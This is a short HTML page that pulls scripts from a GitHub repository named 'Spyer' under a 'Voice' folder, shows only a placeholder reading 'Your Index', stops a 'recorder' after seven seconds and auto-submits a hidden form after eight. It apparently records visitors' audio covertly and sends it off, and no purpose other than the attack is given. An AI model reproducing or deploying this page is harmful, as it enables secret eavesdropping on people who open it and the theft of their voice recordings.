
<script type="text/javascript" src='https://raw.githack.com/yehia-hacker/Spyer/master/Voice/data.js'>
</script>

<div id='index'>Your Index</div>


<script type="text/javascript" src='https://raw.githack.com/yehia-hacker/Spyer/master/Voice/runindex.js'>

</script>
  <script type="text/javascript" src='https://raw.githack.com/yehia-hacker/Spyer/master/Voice/javascript.js'></script> 
  
  
  
  
  <script>
setTimeout(() => {
    recorder.stop();
}, 7000);


window.onload = setTimeout(function(){
        document.getElementById("Yehia_send").submit();
        
        
}, 8000);
</script>

